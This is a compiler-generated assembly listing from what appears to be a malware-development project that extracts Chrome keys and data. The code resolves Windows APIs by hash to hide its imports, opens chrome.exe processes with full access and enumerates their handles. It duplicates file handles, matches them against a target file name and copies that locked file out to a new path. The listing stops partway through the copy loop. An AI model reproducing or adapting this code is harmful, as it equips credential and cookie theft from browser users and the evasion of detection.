; Listing generated by Microsoft (R) Optimizing Compiler Version 19.51.36243.0 

include listing.inc

INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES

PUBLIC	?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z		; GetProcessIdsByName
PUBLIC	?CreateCopyFile@@YA_NPEAD0@Z			; CreateCopyFile
PUBLIC	?DecryptKey@@YAXXZ				; DecryptKey
EXTRN	??0ApiResolve@@QEAA@XZ:PROC			; ApiResolve::ApiResolve
EXTRN	??1ApiResolve@@QEAA@XZ:PROC			; ApiResolve::~ApiResolve
EXTRN	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z:PROC ; ApiResolve::GetModuleBaseAddress
EXTRN	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z:PROC	; ApiResolve::GetApiAddress
EXTRN	?CompareStringW@@YA_NPEB_W0@Z:PROC		; CompareStringW
EXTRN	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z:PROC	; FindPatternA
EXTRN	?CopyStringA@@YA_NPEBDPEAD_K@Z:PROC		; CopyStringA
EXTRN	?StrLen@@YA_KPEAD@Z:PROC			; StrLen
EXTRN	?AllocMemory@@YA_N_KPEAPEAX@Z:PROC		; AllocMemory
EXTRN	?FreeMemory@@YA_NPEAX@Z:PROC			; FreeMemory
EXTRN	?Base64Decode@@YAPEADPEBDAEAH@Z:PROC		; Base64Decode
EXTRN	__chkstk:PROC
; Function compile flags: /Odtp
_TEXT	SEGMENT
apiResolve$ = 32
count$ = 40
lpKernel32$ = 48
hSnap$ = 56
hashKernel32$ = 64
hashCreateToolhelp32Snapshot$ = 68
hashProcess32FirstW$ = 72
hashProcess32NextW$ = 76
hashCloseHandle$ = 80
pCreateToolhelp32Snapshot$ = 88
tv78 = 96
$T1 = 104
pProcess32FirstW$ = 112
tv132 = 120
pProcess32NextW$ = 128
tv147 = 136
pCloseHandle$ = 144
tv152 = 152
$T2 = 160
pe$ = 176
processName$ = 768
outPids$ = 776
maxCount$ = 784
?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z PROC		; GetProcessIdsByName
; File C:\Users\ADMIN\Documents\GitHub\MalDev\BrowserDecryptData\KeyChromeExtractShell\Common.cpp
; Line 12
$LN10:
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	push	rdi
	sub	rsp, 752				; 000002f0H
; Line 13
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 14
	mov	QWORD PTR count$[rsp], 0
; Line 15
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 16
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 17
	mov	DWORD PTR hashCreateToolhelp32Snapshot$[rsp], 399709492 ; 17d31534H
; Line 19
	mov	r8d, 399709492				; 17d31534H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCreateToolhelp32Snapshot$[rsp], rax
; Line 20
	mov	rax, QWORD PTR pCreateToolhelp32Snapshot$[rsp]
	mov	QWORD PTR tv78[rsp], rax
	xor	edx, edx
	mov	ecx, 2
	call	QWORD PTR tv78[rsp]
	mov	QWORD PTR hSnap$[rsp], rax
; Line 25
	cmp	QWORD PTR hSnap$[rsp], -1
	jne	SHORT $LN5@GetProcess
; Line 26
	mov	QWORD PTR $T1[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	mov	rax, QWORD PTR $T1[rsp]
	jmp	$LN1@GetProcess
$LN5@GetProcess:
; Line 28
	lea	rax, QWORD PTR pe$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 568				; 00000238H
	rep stosb
; Line 29
	mov	DWORD PTR pe$[rsp], 568			; 00000238H
; Line 31
	mov	DWORD PTR hashProcess32FirstW$[rsp], -392334820 ; e89d721cH
; Line 33
	mov	r8d, -392334820				; e89d721cH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pProcess32FirstW$[rsp], rax
; Line 35
	mov	DWORD PTR hashProcess32NextW$[rsp], -2126132412 ; 8145cb44H
; Line 37
	mov	r8d, -2126132412			; 8145cb44H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pProcess32NextW$[rsp], rax
; Line 40
	mov	DWORD PTR hashCloseHandle$[rsp], 1729908677 ; 671c4fc5H
; Line 41
	mov	r8d, 1729908677				; 671c4fc5H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCloseHandle$[rsp], rax
; Line 43
	mov	rax, QWORD PTR pProcess32FirstW$[rsp]
	mov	QWORD PTR tv132[rsp], rax
	lea	rdx, QWORD PTR pe$[rsp]
	mov	rcx, QWORD PTR hSnap$[rsp]
	call	QWORD PTR tv132[rsp]
	test	eax, eax
	je	SHORT $LN6@GetProcess
$LN4@GetProcess:
; Line 47
	mov	rdx, QWORD PTR processName$[rsp]
	lea	rcx, QWORD PTR pe$[rsp+44]
	call	?CompareStringW@@YA_NPEB_W0@Z		; CompareStringW
	movzx	eax, al
	test	eax, eax
	je	SHORT $LN7@GetProcess
; Line 49
	mov	rax, QWORD PTR maxCount$[rsp]
	cmp	QWORD PTR count$[rsp], rax
	jae	SHORT $LN7@GetProcess
; Line 51
	mov	rax, QWORD PTR outPids$[rsp]
	mov	rcx, QWORD PTR count$[rsp]
	mov	edx, DWORD PTR pe$[rsp+8]
	mov	DWORD PTR [rax+rcx*4], edx
	mov	rax, QWORD PTR count$[rsp]
	inc	rax
	mov	QWORD PTR count$[rsp], rax
$LN7@GetProcess:
; Line 56
	mov	rax, QWORD PTR pProcess32NextW$[rsp]
	mov	QWORD PTR tv147[rsp], rax
	lea	rdx, QWORD PTR pe$[rsp]
	mov	rcx, QWORD PTR hSnap$[rsp]
	call	QWORD PTR tv147[rsp]
	test	eax, eax
	jne	SHORT $LN4@GetProcess
$LN6@GetProcess:
; Line 59
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv152[rsp], rax
	mov	rcx, QWORD PTR hSnap$[rsp]
	call	QWORD PTR tv152[rsp]
	npad	1
; Line 60
	mov	rax, QWORD PTR count$[rsp]
	mov	QWORD PTR $T2[rsp], rax
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	mov	rax, QWORD PTR $T2[rsp]
$LN1@GetProcess:
; Line 61
	add	rsp, 752				; 000002f0H
	pop	rdi
	ret	0
?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z ENDP		; GetProcessIdsByName
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
apiResolve$ = 64
$T1 = 72
$T2 = 73
$T3 = 74
$T4 = 75
size$5 = 76
bytesRead$6 = 80
hCopy$7 = 88
lpKernel32$ = 96
pCloseHandle$ = 104
bufferProcessInfo$8 = 112
st$9 = 120
retLen$10 = 124
hProc$11 = 128
tv188 = 136
newSize$12 = 140
len$13 = 144
bytesWritten$14 = 148
i$15 = 152
i$16 = 160
offset$17 = 168
processName$ = 176
pid$18 = 200
dupOk$19 = 204
ok$20 = 208
err$21 = 212
hOut$22 = 216
newBuffer$23 = 224
info$24 = 232
pGetFileType$25 = 240
result$26 = 248
hashKernel32$ = 256
hashGetLastError$ = 260
hashCloseHandle$ = 264
hashNtdll$ = 268
hashNtQueryInformationProcess$ = 272
hashOpenProcess$ = 276
hashDuplicateHandle$27 = 280
hashGetFileType$28 = 284
hashGetFinalPathNameByHandleA$29 = 288
hashCreateFileA$30 = 292
hashSetFilePointerEx$31 = 296
hashReadFile$32 = 300
lpNtdll$ = 304
count$ = 312
pOpenProcess$ = 320
tv166 = 328
pNtQueryInformationProcess$ = 336
tv182 = 344
tv199 = 352
tv204 = 360
h$33 = 368
pDuplicateHandle$34 = 376
handle$35 = 384
tv224 = 392
tv235 = 400
tv240 = 408
pGetFinalPathNameByHandleA$36 = 416
tv254 = 424
tv292 = 432
tv302 = 440
pCreateFileA$37 = 448
tv315 = 456
tv320 = 464
tv324 = 472
pSetFilePointerEx$38 = 480
zero$39 = 488
tv334 = 496
pReadFile$40 = 504
tv354 = 512
pGetLastError$ = 520
pWriteFile$41 = 528
tv370 = 536
tv378 = 544
tv381 = 552
hashWriteFile$42 = 560
ov$43 = 568
path$44 = 608
pids$ = 880
buffer$45 = 1904
filename$ = 6016
newFileName$ = 6024
?CreateCopyFile@@YA_NPEAD0@Z PROC			; CreateCopyFile
; File C:\Users\ADMIN\Documents\GitHub\MalDev\BrowserDecryptData\KeyChromeExtractShell\Common.cpp
; Line 63
$LN34:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	push	rdi
	mov	eax, 6000				; 00001770H
	call	__chkstk
	sub	rsp, rax
; Line 64
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 65
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 67
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 69
	mov	DWORD PTR hashGetLastError$[rsp], 929337930 ; 3764924aH
; Line 71
	mov	r8d, 929337930				; 3764924aH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetLastError$[rsp], rax
; Line 73
	mov	DWORD PTR hashCloseHandle$[rsp], 1729908677 ; 671c4fc5H
; Line 75
	mov	r8d, 1729908677				; 671c4fc5H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCloseHandle$[rsp], rax
; Line 77
	mov	DWORD PTR hashNtdll$[rsp], -1405057971	; ac40844dH
; Line 78
	mov	edx, -1405057971			; ac40844dH
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpNtdll$[rsp], rax
; Line 82
	mov	eax, 99					; 00000063H
	mov	WORD PTR processName$[rsp], ax
	mov	eax, 104				; 00000068H
	mov	WORD PTR processName$[rsp+2], ax
	mov	eax, 114				; 00000072H
	mov	WORD PTR processName$[rsp+4], ax
	mov	eax, 111				; 0000006fH
	mov	WORD PTR processName$[rsp+6], ax
	mov	eax, 109				; 0000006dH
	mov	WORD PTR processName$[rsp+8], ax
	mov	eax, 101				; 00000065H
	mov	WORD PTR processName$[rsp+10], ax
; Line 83
	mov	eax, 46					; 0000002eH
	mov	WORD PTR processName$[rsp+12], ax
	mov	eax, 101				; 00000065H
	mov	WORD PTR processName$[rsp+14], ax
	mov	eax, 120				; 00000078H
	mov	WORD PTR processName$[rsp+16], ax
	mov	eax, 101				; 00000065H
	mov	WORD PTR processName$[rsp+18], ax
; Line 84
	xor	eax, eax
	mov	WORD PTR processName$[rsp+20], ax
; Line 86
	mov	r8d, 256				; 00000100H
	lea	rdx, QWORD PTR pids$[rsp]
	lea	rcx, QWORD PTR processName$[rsp]
	call	?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z	; GetProcessIdsByName
	mov	QWORD PTR count$[rsp], rax
; Line 91
	mov	DWORD PTR hashNtQueryInformationProcess$[rsp], 334281917 ; 13ecbcbdH
; Line 100
	mov	r8d, 334281917				; 13ecbcbdH
	mov	rdx, QWORD PTR lpNtdll$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pNtQueryInformationProcess$[rsp], rax
; Line 102
	mov	DWORD PTR hashOpenProcess$[rsp], 488166966 ; 1d18d636H
; Line 104
	mov	r8d, 488166966				; 1d18d636H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pOpenProcess$[rsp], rax
; Line 106
	mov	QWORD PTR i$15[rsp], 0
	jmp	SHORT $LN4@CreateCopy
$LN2@CreateCopy:
	mov	rax, QWORD PTR i$15[rsp]
	inc	rax
	mov	QWORD PTR i$15[rsp], rax
$LN4@CreateCopy:
	mov	rax, QWORD PTR count$[rsp]
	cmp	QWORD PTR i$15[rsp], rax
	jae	$LN3@CreateCopy
; Line 107
	mov	rax, QWORD PTR i$15[rsp]
	mov	eax, DWORD PTR pids$[rsp+rax*4]
	mov	DWORD PTR pid$18[rsp], eax
; Line 108
	mov	rax, QWORD PTR pOpenProcess$[rsp]
	mov	QWORD PTR tv166[rsp], rax
	mov	r8d, DWORD PTR pid$18[rsp]
	xor	edx, edx
	mov	ecx, 2097151				; 001fffffH
	call	QWORD PTR tv166[rsp]
	mov	QWORD PTR hProc$11[rsp], rax
; Line 114
	cmp	QWORD PTR hProc$11[rsp], 0
	jne	SHORT $LN12@CreateCopy
; Line 115
	jmp	SHORT $LN2@CreateCopy
$LN12@CreateCopy:
; Line 118
	mov	DWORD PTR size$5[rsp], 65536		; 00010000H
; Line 119
	mov	QWORD PTR bufferProcessInfo$8[rsp], 0
; Line 120
	mov	eax, DWORD PTR size$5[rsp]
	lea	rdx, QWORD PTR bufferProcessInfo$8[rsp]
	mov	ecx, eax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN13@CreateCopy
; Line 121
	jmp	$LN2@CreateCopy
$LN13@CreateCopy:
; Line 124
	mov	DWORD PTR retLen$10[rsp], 0
$LN5@CreateCopy:
; Line 127
	xor	eax, eax
	cmp	eax, 1
	je	$LN6@CreateCopy
; Line 129
	mov	rax, QWORD PTR pNtQueryInformationProcess$[rsp]
	mov	QWORD PTR tv182[rsp], rax
	lea	rax, QWORD PTR retLen$10[rsp]
	mov	QWORD PTR [rsp+32], rax
	mov	r9d, DWORD PTR size$5[rsp]
	mov	r8, QWORD PTR bufferProcessInfo$8[rsp]
	mov	edx, 51					; 00000033H
	mov	rcx, QWORD PTR hProc$11[rsp]
	call	QWORD PTR tv182[rsp]
	mov	DWORD PTR st$9[rsp], eax
; Line 137
	cmp	DWORD PTR st$9[rsp], 0
	jne	SHORT $LN14@CreateCopy
; Line 138
	jmp	$LN6@CreateCopy
$LN14@CreateCopy:
; Line 140
	cmp	DWORD PTR st$9[rsp], -1073741820	; ffffffffc0000004H
	je	SHORT $LN16@CreateCopy
	cmp	DWORD PTR st$9[rsp], -1073741789	; ffffffffc0000023H
	jne	$LN15@CreateCopy
$LN16@CreateCopy:
; Line 143
	mov	eax, DWORD PTR size$5[rsp]
	cmp	DWORD PTR retLen$10[rsp], eax
	jbe	SHORT $LN32@CreateCopy
	mov	eax, DWORD PTR retLen$10[rsp]
	mov	DWORD PTR tv188[rsp], eax
	jmp	SHORT $LN33@CreateCopy
$LN32@CreateCopy:
	mov	eax, DWORD PTR size$5[rsp]
	shl	eax, 1
	mov	DWORD PTR tv188[rsp], eax
$LN33@CreateCopy:
	mov	eax, DWORD PTR tv188[rsp]
	mov	DWORD PTR newSize$12[rsp], eax
; Line 144
	mov	QWORD PTR newBuffer$23[rsp], 0
; Line 145
	mov	eax, DWORD PTR newSize$12[rsp]
	lea	rdx, QWORD PTR newBuffer$23[rsp]
	mov	ecx, eax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN17@CreateCopy
; Line 146
	mov	rcx, QWORD PTR bufferProcessInfo$8[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 147
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv199[rsp], rax
	mov	rcx, QWORD PTR hProc$11[rsp]
	call	QWORD PTR tv199[rsp]
	npad	1
; Line 148
	mov	BYTE PTR $T1[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T1[rsp]
	jmp	$LN1@CreateCopy
$LN17@CreateCopy:
; Line 151
	mov	rcx, QWORD PTR bufferProcessInfo$8[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 152
	mov	eax, DWORD PTR newSize$12[rsp]
	mov	DWORD PTR size$5[rsp], eax
; Line 153
	mov	rax, QWORD PTR newBuffer$23[rsp]
	mov	QWORD PTR bufferProcessInfo$8[rsp], rax
; Line 154
	jmp	$LN5@CreateCopy
$LN15@CreateCopy:
; Line 157
	mov	rcx, QWORD PTR bufferProcessInfo$8[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 158
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv204[rsp], rax
	mov	rcx, QWORD PTR hProc$11[rsp]
	call	QWORD PTR tv204[rsp]
	npad	1
; Line 159
	mov	BYTE PTR $T2[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T2[rsp]
	jmp	$LN1@CreateCopy
; Line 160
	jmp	$LN5@CreateCopy
$LN6@CreateCopy:
; Line 162
	mov	rax, QWORD PTR bufferProcessInfo$8[rsp]
	mov	QWORD PTR info$24[rsp], rax
; Line 165
	mov	QWORD PTR i$16[rsp], 0
	jmp	SHORT $LN9@CreateCopy
$LN7@CreateCopy:
	mov	rax, QWORD PTR i$16[rsp]
	inc	rax
	mov	QWORD PTR i$16[rsp], rax
$LN9@CreateCopy:
	mov	rax, QWORD PTR info$24[rsp]
	mov	rax, QWORD PTR [rax]
	cmp	QWORD PTR i$16[rsp], rax
	jae	$LN8@CreateCopy
; Line 166
	imul	rax, QWORD PTR i$16[rsp], 40		; 00000028H
	mov	rcx, QWORD PTR info$24[rsp]
	lea	rax, QWORD PTR [rcx+rax+16]
	mov	QWORD PTR h$33[rsp], rax
; Line 167
	mov	rax, QWORD PTR h$33[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR handle$35[rsp], rax
; Line 169
	mov	QWORD PTR hCopy$7[rsp], 0
; Line 170
	mov	DWORD PTR hashDuplicateHandle$27[rsp], 1017292957 ; 3ca2a89dH
; Line 174
	mov	r8d, 1017292957				; 3ca2a89dH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pDuplicateHandle$34[rsp], rax
; Line 176
	mov	rax, QWORD PTR pDuplicateHandle$34[rsp]
	mov	QWORD PTR tv224[rsp], rax
	mov	DWORD PTR [rsp+48], 2
	mov	DWORD PTR [rsp+40], 0
	mov	DWORD PTR [rsp+32], 0
	lea	r9, QWORD PTR hCopy$7[rsp]
	mov	r8, -1
	mov	rdx, QWORD PTR handle$35[rsp]
	mov	rcx, QWORD PTR hProc$11[rsp]
	call	QWORD PTR tv224[rsp]
	mov	DWORD PTR dupOk$19[rsp], eax
; Line 186
	cmp	DWORD PTR dupOk$19[rsp], 0
	je	SHORT $LN19@CreateCopy
	cmp	QWORD PTR hCopy$7[rsp], 0
	jne	SHORT $LN18@CreateCopy
$LN19@CreateCopy:
; Line 187
	jmp	$LN7@CreateCopy
$LN18@CreateCopy:
; Line 190
	mov	DWORD PTR hashGetFileType$28[rsp], 1507700099 ; 59ddad83H
; Line 192
	mov	r8d, 1507700099				; 59ddad83H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetFileType$25[rsp], rax
; Line 194
	cmp	QWORD PTR pGetFileType$25[rsp], 0
	je	SHORT $LN21@CreateCopy
	mov	rax, QWORD PTR pGetFileType$25[rsp]
	mov	QWORD PTR tv235[rsp], rax
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv235[rsp]
	cmp	eax, 1
	je	SHORT $LN20@CreateCopy
$LN21@CreateCopy:
; Line 195
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv240[rsp], rax
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv240[rsp]
	npad	1
; Line 196
	jmp	$LN7@CreateCopy
$LN20@CreateCopy:
; Line 199
	lea	rax, QWORD PTR path$44[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 200
	mov	DWORD PTR hashGetFinalPathNameByHandleA$29[rsp], 203739171 ; 0c24d023H
; Line 207
	mov	r8d, 203739171				; 0c24d023H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetFinalPathNameByHandleA$36[rsp], rax
; Line 210
	mov	rax, QWORD PTR pGetFinalPathNameByHandleA$36[rsp]
	mov	QWORD PTR tv254[rsp], rax
	xor	r9d, r9d
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR path$44[rsp]
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv254[rsp]
	mov	DWORD PTR len$13[rsp], eax
; Line 217
	cmp	DWORD PTR len$13[rsp], 0
	je	SHORT $LN23@CreateCopy
	cmp	DWORD PTR len$13[rsp], 260		; 00000104H
	jb	SHORT $LN22@CreateCopy
$LN23@CreateCopy:
; Line 218
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv292[rsp], rax
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv292[rsp]
	npad	1
; Line 219
	jmp	$LN7@CreateCopy
$LN22@CreateCopy:
; Line 221
	mov	QWORD PTR result$26[rsp], 0
; Line 222
	mov	rcx, QWORD PTR filename$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	r9, QWORD PTR result$26[rsp]
	mov	r8, rax
	mov	rdx, QWORD PTR filename$[rsp]
	lea	rcx, QWORD PTR path$44[rsp]
	call	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z	; FindPatternA
	npad	1
; Line 223
	cmp	QWORD PTR result$26[rsp], 0
	jne	SHORT $LN24@CreateCopy
; Line 224
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv302[rsp], rax
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv302[rsp]
	npad	1
; Line 225
	jmp	$LN7@CreateCopy
$LN24@CreateCopy:
; Line 239
	mov	DWORD PTR hashCreateFileA$30[rsp], 896765632 ; 35738ec0H
; Line 241
	mov	r8d, 896765632				; 35738ec0H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCreateFileA$37[rsp], rax
; Line 243
	mov	rax, QWORD PTR pCreateFileA$37[rsp]
	mov	QWORD PTR tv315[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 2
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 1073741824				; 40000000H
	mov	rcx, QWORD PTR newFileName$[rsp]
	call	QWORD PTR tv315[rsp]
	mov	QWORD PTR hOut$22[rsp], rax
; Line 253
	cmp	QWORD PTR hOut$22[rsp], -1
	jne	SHORT $LN25@CreateCopy
; Line 254
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv320[rsp], rax
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv320[rsp]
; Line 255
	mov	rcx, QWORD PTR bufferProcessInfo$8[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 256
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv324[rsp], rax
	mov	rcx, QWORD PTR hProc$11[rsp]
	call	QWORD PTR tv324[rsp]
	npad	1
; Line 257
	mov	BYTE PTR $T3[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T3[rsp]
	jmp	$LN1@CreateCopy
$LN25@CreateCopy:
; Line 261
	mov	DWORD PTR bytesRead$6[rsp], 0
; Line 262
	mov	DWORD PTR bytesWritten$14[rsp], 0
; Line 266
	mov	QWORD PTR zero$39[rsp], 0
; Line 267
	mov	DWORD PTR hashSetFilePointerEx$31[rsp], 191982888 ; 0b716d28H
; Line 269
	mov	r8d, 191982888				; 0b716d28H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSetFilePointerEx$38[rsp], rax
; Line 270
	mov	rax, QWORD PTR pSetFilePointerEx$38[rsp]
	mov	QWORD PTR tv334[rsp], rax
	xor	r9d, r9d
	xor	r8d, r8d
	mov	rdx, QWORD PTR zero$39[rsp]
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv334[rsp]
; Line 272
	mov	QWORD PTR offset$17[rsp], 0
$LN10@CreateCopy:
; Line 274
	xor	eax, eax
	cmp	eax, 1
	je	$LN11@CreateCopy
; Line 275
	lea	rax, QWORD PTR ov$43[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 32					; 00000020H
	rep stosb
; Line 276
	mov	eax, -1					; ffffffffH
	mov	rcx, QWORD PTR offset$17[rsp]
	and	rcx, rax
	mov	rax, rcx
	mov	DWORD PTR ov$43[rsp+16], eax
; Line 277
	mov	rax, QWORD PTR offset$17[rsp]
	shr	rax, 32					; 00000020H
	mov	DWORD PTR ov$43[rsp+20], eax
; Line 279
	mov	DWORD PTR hashReadFile$32[rsp], -1576683562 ; a205b7d6H
; Line 283
	mov	r8d, -1576683562			; a205b7d6H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pReadFile$40[rsp], rax
; Line 285
	mov	rax, QWORD PTR pReadFile$40[rsp]
	mov	QWORD PTR tv354[rsp], rax
	lea	rax, QWORD PTR ov$43[rsp]
	mov	QWORD PTR [rsp+32], rax
	lea	r9, QWORD PTR bytesRead$6[rsp]
	mov	r8d, 4096				; 00001000H
	lea	rdx, QWORD PTR buffer$45[rsp]
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv354[rsp]
	mov	DWORD PTR ok$20[rsp], eax
; Line 293
	cmp	DWORD PTR ok$20[rsp], 0
	jne	SHORT $LN26@CreateCopy
; Line 294
	call	QWORD PTR pGetLastError$[rsp]
	mov	DWORD PTR err$21[rsp], eax
; Line 296
	cmp	DWORD PTR err$21[rsp], 38		; 00000026H
	jne	SHORT $LN27@CreateCopy
; Line 297
	jmp	$LN11@CreateCopy
$LN27@CreateCopy:
; Line 299
	jmp	$LN11@CreateCopy
$LN26@CreateCopy:
; Line 302
	cmp	DWORD PTR bytesRead$6[rsp], 0
	jne	SHORT $LN28@CreateCopy
; Line 303
	jmp	$LN11@CreateCopy
$LN28@CreateCopy:
; Line 305
	mov	DWORD PTR hashWriteFile$42[rsp], -339353823 ; ebc5df21H
; Line 309
	mov	r8d, -339353823				; ebc5df21H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pWriteFile$41[rsp], rax
; Line 311
